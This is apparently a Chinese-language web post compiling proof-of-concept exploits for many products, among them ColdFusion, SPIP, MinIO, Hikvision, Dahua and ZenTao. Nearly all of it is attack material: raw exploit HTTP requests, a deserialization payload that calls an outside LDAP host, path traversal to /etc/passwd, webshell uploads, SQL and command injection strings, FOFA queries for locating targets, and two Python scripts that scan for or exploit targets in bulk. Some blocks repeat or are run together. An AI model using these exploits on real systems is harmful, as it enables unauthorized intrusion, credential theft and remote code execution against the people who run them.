360 新天擎终端安全管理系统信息泄露漏洞
http://ip:port/runtime/admin_log_conf.cache
Adobe ColdFusion 反序列化漏洞CVE-2023-29300
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 1.2.3.4:1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id
argumentCollection=
<wddxPacket version='1.0'>
<header/>
<data>
<struct type='xcom.sun.rowset.JdbcRowSetImplx'>
<var name='dataSourceName'>
<string>ldap://xxx.xxx.xxx:1234/Basic/TomcatEcho</string>
</var>
<var name='autoCommit'>
<boolean value='true'/>
</var>
</struct>
</data>
</wddxPacket>Coremail 邮件系统未授权访问获取管理员账密POC
/coremail/common/assets/;l;/;/;/;/;/s?biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2CVE-2023-27372 SPIP CMS远程代码执行漏洞
0x01 漏洞概述
漏洞编号:CVE-2023-27372
SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。
0x02 影响版本
SPIP < 4.2.1
0x03 漏洞复现
方式一:FOFA语句:app="SPIP"
POST /spip/spip.php?page=spip_pass HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: cibcInit=oui
Content-Length: 215
Content-Type: application/x-www-form-urlencoded
page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=
这里formulaire_action_args参数需访问路径:/spip.php?page=spip_pass获取,标签为:input,name为:formulaire_action_args
page=spip_pass&formulaire_action=oubli&formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&oubli=s:19:"<?php phpinfo(); ?>";&nobot=通过上面的代码我们可以清楚的看到我们执行了 phpinfo()函数,执行结果如下。表示我们成功复现了该漏洞。
exp
https://github.com/Pari-Malam/CVE-2023-27372
CVE-2023-28432 MinIO集群模式信息泄露漏洞复现
0x01 漏洞概述
漏洞编号:CVE-2023-28432 CNNVD-202303-1795
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
MinIO 存在信息泄露漏洞,该漏洞源于在集群部署中MinIO会返回所有环境变量,导致信息泄露。
0x02 影响版本
2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
0x03 漏洞复现
方式一:可以通过FOFA进行搜索,搜索的语法格式如下:
title="MinIO Browser"
漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,通过BP抓包分析。
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.126.128:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
(data数据为空 详情复现截图可查看原文链接)
https://mp.weixin.qq.com/s/SXAEQ3WSOSo_sqGTXN7S6Q
利用泄露的用户名和密码登录系统。
# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# 自定义请求头字段
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
}
vulurl=[]
#url合规检测执行
def urltest(url):
parsed_url = urlsplit(url)
if parsed_url.port == "443" and parsed_url.netloc:
url="https://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
vultest(url)
if parsed_url.netloc and parsed_url.path:
url=parsed_url.scheme+"://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
vultest(url)
elif parsed_url.netloc:
url=url+"/minio/bootstrap/v1/verify"
vultest(url)
elif (not parsed_url.scheme) and parsed_url.path:
url_1="http://"+url+"/minio/bootstrap/v1/verify"
vultest(url_1)
url_2="https://"+url+"/minio/bootstrap/v1/verify"
vultest(url_2)
else:
modified_string = re.sub(r"[/\\].*", "/minio/bootstrap/v1/verify", url)
url_1="http://"+modified_string
vultest(url_1)
url_2="https://"+modified_string
vultest(url_2)
#漏洞检测
def vultest(url):
try:
response = requests.post(url, data=data, headers=headers, verify=False , timeout=3)
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
# 检查响应头的状态码是否为200
if response.status_code == 200 and ("MinioEnv" in response.text):
vulurl.append(url)
print(url+" [+]漏洞存在!!!")
else:
print(url+" [-]漏洞不存在。")
except RequestException:
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
print(url+" [-]请求失败。")
#读取url或file
def main():
# 禁用警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description="读取命令行参数")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u', '--url', help='URL 参数')
group.add_argument('-f', '--file', help='file 参数')
args = parser.parse_args()
if args.url:
urltest(args.url)
elif args.file:
threads_queue=[]
with open(args.file, 'r') as file:
for line in file:
line=line.strip()
read_thread = threading.Thread(target=urltest, args=(line,))
threads_queue.append(read_thread)
read_thread.start()
for thread in threads_queue:
thread.join()
print("\n存在漏洞列表:")
for url in vulurl:
print(url+" [+]漏洞存在!!!")
if __name__ == "__main__":
main()Eramba任意代码执行漏洞
GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: "sh: 1: --dpi: not found
"
stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether [redacted] brd ff:ff:ff:ff:ff:ff
inet [redacted] brd [redacted] scope global ens33
valid_lft forever preferred_lft forever
inet6 [redacted] scope link
valid_lft forever preferred_lft forever
"
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html'
'/tmp/knp_snappy6426d423104587.46971034.pdf'. </title>GDidees CMS任意文件上传漏洞复现与利用分析
0x01 漏洞概述
漏洞编号:CVE-2023-27178
GDidees CMS是法国一款开源的网站管理工具,可用于创建站点、照片或视频库。GDidees CMS 3.9.1及以下版本存在任意文件上传漏洞,允许未经授权的攻击者上传精心构造的文件并执行任意代码。
0x02 影响版本
GDidees CMS 3.9.1及以下。
0x03 漏洞复现
创建文件格式为phar的一句话木马文件。
访问Roxy Fileman插件页面。
上传木马
此时我们发现,携带参数cmd=echo ‘csx lab’;访问cmd.phar页面,可以看到php代码成功执行。证明漏洞存在。
修复意见:
修改conf.json文件中的FORBIDDEN_UPLOADS字段,禁止上传phar格式的文件。
gitlab路径遍历读取任意文件漏洞
可能需要登录
GET /group1/group2/group3/group4/group5/group6/group7/group8/group9/project9/uploads/4e02c376ac758e162ec674399741e38d//..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
HIKVISION iSecure Center综合安防管理平台文件上传
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream
9YPQ3I3ZS
#!usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包
}
def run(arg):
try:
flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9))
filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
vuln_url=arg+"center/api/files;.js"
headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
'Accept': '*/*',
'Content-Type': 'application/x-www-form-urlencoded'}
file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
if r.status_code==200 and "webapps/clusterMgr" in r.text:
payload=f"clusterMgr/{filename}.txt;.js"
url=arg+payload
r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
if r2.status_code==200 and flag in r2.text:
print('\033[1;31;40m')
print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址:{url}")
print('\033[0m')
else:
print(arg+":不存在漏洞")
except:
print(arg+":不存在漏洞")
if __name__ == '__main__':
url=sys.argv[1]
run(url)
HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a--
----WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp 的马%>
------WebKitFormBoundary9PggsiM755PLa54a--HiKVISION 综合安防管理平台 report 任意文件上传漏洞
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a--
----WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip
<%jsp 的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
马儿路径:/portal/ui/login/..;/..;/new.jsp华天动力 oa SQL 注入
POC:
访问
http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100
xxx
抓包
POST /report/reportServlet?action=8 HTTP/1.1
Host: xxxx
Content-Length: 145
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx/
Content-Type: application/x-www-form-urlencoded
User-
Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParams
Id=100xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
Connection: close
year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2Fs
howReport.jsp%3Fraq%3D%252FJourTemp2.raq&currTab=HiKVISION 综合安防管理平台 env 信息泄漏
POC:
/artemis-portal/artemis/env
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载
POC:
<?php $file_name = $_GET['fileName']; $file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r"); while($line = fgets($fp)){ $line = nl2br(htmlentities(
$line, ENT_COMPAT, "utf-8")); echo '<span style="font-
size:16px">'.$line.'</span>'; } fclose($fp);?>
/serverLog/showFile.php?fileName=../web/html/main.php大华 智慧园区综合管理平台 video 任意文件上传漏洞
POC:
POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like
Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data;HIKVISION视频编码设备接入网关 showFile.php 任意文件下载
POC:
<?php $file_name = $_GET['fileName']; $file_path = '../../../log/'.$file_name;
$fp = fopen($file_path, "r"); while($line = fgets($fp)){ $line = nl2br(htmlentities(
$line, ENT_COMPAT, "utf-8")); echo '<span style="font-
size:16px">'.$line.'</span>'; } fclose($fp);?>
/serverLog/showFile.php?fileName=../web/html/main.php大华 智慧园区综合管理平台 video 任意文件上传漏洞
POC:
POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
路径/publishingImg/VIDEO/230812152005170200.jsp大华 智慧园区综合管理平台 getFaceCapture SQL 注入漏洞
POC:
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%2
2:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)-
-%22%7D/extend/%7B%7D
禅道 v18.0-v18.3 后台命令执行
POC:
POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://127.0.0.1
Connection: close
Cookie: zentaosid=dhjpu2i3g51l6j5eba85aql27f; lang=zh-
cn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=
2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
评论 (0)